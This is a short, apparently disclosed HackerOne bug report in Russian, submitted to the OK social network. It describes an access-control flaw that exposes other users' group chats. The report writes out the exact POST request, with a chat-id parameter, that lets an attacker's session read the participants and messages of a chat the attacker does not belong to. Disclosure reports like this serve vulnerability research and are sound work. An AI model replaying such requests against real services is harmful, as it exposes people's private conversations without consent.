Доступ к чужим групповым беседам.

Disclosed: 2016-04-29 09:59:15 By 4lemon To ok
Unknown
Vulnerability Details
1. В аккаунте жертвы сделем групповой чат, в который не входит атакующий 2. Запомним параметр d.chi:64052989157445 3. Из сессии атакующего сделаем запрос информации о беседе. > POST /settings/feed/apps?cmd=ToolbarMessages&gwt.requested=129bff65&st.cmd=userConfigFeed&st.type=2&p_sId=758860922374599189 HTTP/1.1 > tlb.act=act.rci&d.chi=64052989157445&d.coi=555409084413&d.wh=544&refId=mrcc-1438008870180 Получаем всю информацию о беседе: - участники - сообщения
Actions
View on HackerOne
Report Stats
  • Report ID: 79046
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report